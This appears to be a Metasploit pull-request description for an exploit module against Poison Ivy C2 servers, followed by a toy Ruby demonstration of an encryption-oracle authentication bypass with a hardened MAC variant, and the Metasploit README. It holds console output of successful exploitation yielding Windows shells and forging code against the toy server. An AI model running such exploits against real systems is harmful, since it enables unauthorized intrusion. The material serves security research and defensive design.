0a0e7ab4ba
module removing the need for brute force in the case of an unknown server password by (ab)using the challenge-response as an encryption oracle, making it more reliable. The vulnerability has also been confirmed in versions 2.2.0 up to 2.3.1 and additional targets for these versions have been added as well. See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/ for details.

## Console output

Below is an example of the new functionality (PIVY C2 server password is set to 'prettysecure' and unknown to the attacker). Exploitation of versions 2.3.0 and 2.3.1 is similar.

### Version 2.3.2 (unknown password)

```
msf > use windows/misc/poisonivy_bof
msf exploit(poisonivy_bof) > set RHOST 192.168.0.103
RHOST => 192.168.0.103
msf exploit(poisonivy_bof) > check
[*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2>
```

### Version 2.2.0 (unknown password)

```
msf exploit(poisonivy_bof) > check
[*] Vulnerable Poison Ivy C&C version 2.2.0 detected.
[*] 192.168.0.103:3460 - The target appears to be vulnerable.
msf exploit(poisonivy_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1
   1   Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1
   2   Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1

msf exploit(poisonivy_bof) > set TARGET 0
TARGET => 0
msf exploit(poisonivy_bof) > exploit

[*] Started bind handler
[*] Performing handshake...
[*] Sending exploit...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0>
```
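The commit message above turns the C2 handshake into an encryption oracle so the exploit no longer needs the server password. The toy protocol below is an added example written for this page; it is not the Metasploit module's code and it does not describe the real Poison Ivy handshake. It models the design mistake in the abstract: a server that proves it knows the password by encrypting a client-chosen challenge under the password key, and then trusts any command it can decrypt under that same key. An attacker who never learns the password gets the server to encrypt the command frame for them. A hardened variant sits beside it. AES-256-CBC (standing in for whatever the real C2 uses), the SHA-256 key derivation, the `CMD:` framing, the 256-byte challenge and all class and function names are assumptions of this example.

```ruby
require 'openssl'

# Added example, not code from the Metasploit module or the Poison Ivy protocol.
# Cipher, key derivation, framing and challenge size are assumptions of this toy.

BLOCK = 16
CHALLENGE_LEN = 256

def cbc(mode, key, iv, data)
  c = OpenSSL::Cipher.new('aes-256-cbc')
  mode == :encrypt ? c.encrypt : c.decrypt
  c.key = key
  c.iv = iv
  c.padding = 0 # callers send whole blocks; frames are padded with NULs
  c.update(data) + c.final
end

def hmac(key, data)
  OpenSSL::HMAC.digest('SHA256', key, data)
end

def constant_time_eq(a, b)
  a.bytesize == b.bytesize && a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# A command frame is "CMD:<command>" padded with NULs; returns the command or nil.
def parse_frame(plain)
  return nil unless plain.b.start_with?('CMD:'.b)
  plain.b[4..-1].delete("\x00")
end

# Vulnerable server: one key, fixed IV, and "decrypts to a valid frame" taken to
# mean "the sender knew the password".
class OracleC2Server
  ZERO_IV = ("\x00" * BLOCK).b

  def initialize(password)
    @key = OpenSSL::Digest::SHA256.digest(password) # hypothetical KDF
  end

  # Handshake: the server proves it knows the password by encrypting the client's
  # challenge. The client chooses the challenge, so this is a chosen-plaintext oracle.
  def handshake(challenge)
    raise ArgumentError, "challenge must be #{CHALLENGE_LEN} bytes" unless challenge.bytesize == CHALLENGE_LEN
    cbc(:encrypt, @key, ZERO_IV, challenge)
  end

  # Command channel: same key and IV as the handshake, so oracle output is a valid command.
  def receive_command(ciphertext)
    return nil unless ciphertext.bytesize % BLOCK == 0
    parse_frame(cbc(:decrypt, @key, ZERO_IV, ciphertext))
  end
end

# Attacker who does not know the password: have the server encrypt the frame itself.
def forge_command(server, command)
  server.handshake("CMD:#{command}".ljust(CHALLENGE_LEN, "\x00"))
end

# Hardened design: one key per purpose, a MAC (never an encryption of peer-chosen
# bytes) as the handshake answer, and a MAC over IV+ciphertext checked before decrypting.
def derive_keys(password)
  master = OpenSSL::Digest::SHA256.digest(password) # hypothetical KDF
  { handshake: hmac(master, 'handshake'), enc: hmac(master, 'enc'), mac: hmac(master, 'mac') }
end

class MacC2Server
  def initialize(password)
    @keys = derive_keys(password)
  end

  # Still proves knowledge of the password, but encrypts nothing under any key.
  def handshake(challenge)
    hmac(@keys[:handshake], challenge)
  end

  # Returns the command only if the tag verifies under the separate MAC key.
  def receive_command(iv, ciphertext, tag)
    return nil unless constant_time_eq(tag, hmac(@keys[:mac], iv + ciphertext))
    return nil unless iv.bytesize == BLOCK && ciphertext.bytesize % BLOCK == 0
    parse_frame(cbc(:decrypt, @keys[:enc], iv, ciphertext))
  end
end

# Legitimate client for the hardened server; only a password holder can produce the tag.
def client_seal(password, command)
  keys = derive_keys(password)
  iv = OpenSSL::Random.random_bytes(BLOCK)
  ct = cbc(:encrypt, keys[:enc], iv, "CMD:#{command}".ljust(CHALLENGE_LEN, "\x00"))
  [iv, ct, hmac(keys[:mac], iv + ct)]
end

if __FILE__ == $PROGRAM_NAME
  secret = 'prettysecure' # operator's password, unknown to the attacker (constructed value)
  oracle = OracleC2Server.new(secret)
  puts "oracle server runs:        #{oracle.receive_command(forge_command(oracle, 'whoami')).inspect}"
  hardened = MacC2Server.new(secret)
  frame = 'CMD:whoami'.ljust(CHALLENGE_LEN, "\x00")
  puts "hardened server, forgery:  #{hardened.receive_command("\x00" * BLOCK, frame, hardened.handshake(frame)).inspect}"
  puts "hardened server, client:   #{hardened.receive_command(*client_seal(secret, 'whoami')).inspect}"
end
```

The check to carry away: any handshake whose reply is the keyed encryption of bytes the peer chose is a chosen-plaintext oracle, and it becomes an authentication bypass as soon as the same key and mode protect data the server later decrypts and acts on. The hardened server breaks both halves of that chain: the handshake reply is a MAC under a handshake-only key, and the command channel verifies a MAC under a separate key before decrypting anything, so oracle output is never a valid command.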
README.md
# Metasploit
The Metasploit Framework is released under a BSD-style license. See COPYING for more details.
The latest version of this software is available from: https://metasploit.com
Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework
New bugs and feature requests should be directed to: http://r-7.co/MSF-BUGv1
API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
## Installing
Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.
## Using Metasploit

Metasploit can do all sorts of things. The first thing you'll want to do is start msfconsole, but after that, you'll probably be best served by reading Metasploit Unleashed, the great community resources, or the wiki.
## Contributing
See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.